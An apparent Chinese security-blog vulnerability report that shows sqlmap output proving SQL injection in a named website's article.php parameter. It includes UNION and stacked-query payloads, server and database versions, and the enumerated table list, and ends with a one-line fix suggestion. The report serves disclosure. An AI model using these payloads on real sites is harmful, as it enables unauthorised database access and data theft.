![]() ![]() ![]() 注入点: http://www.fengxiaowang.cn:80/article.php?aa_id=* (GET) sqlmap identified the following injection points with a total of 184 HTTP(s) requests: --- Place: URI Parameter: #1* Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: http://www.fengxiaowang.cn:80/article.php?aa_id=' UNION ALL SELECT NULL,CONCAT(0x7177726971,0x536248626f76574b6549,0x7178746671),NULL,NULL,NULL,NULL,NULL# Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: http://www.fengxiaowang.cn:80/article.php?aa_id='; SELECT SLEEP(5)-- --- web application technology: Nginx, PHP 5.2.13 back-end DBMS: MySQL 5.0.11 web application technology: Nginx, PHP 5.2.13 back-end DBMS: MySQL 5.0.11 Database: b2b_fenxiaowang [9 tables] +------------------+ | category | | data | | photo | | photo_extend | | product_active | | products | | products_content | | products_extend | | webnews | +------------------+
修复方案: 问题参数过滤 |
-
上一篇: ShopEx短信通系统sql注入(POST) - 网站安全 - 自学
下一篇: Web安全初探-SQL注入 - 网站安全 - 自学php
还没有人抢沙发呢~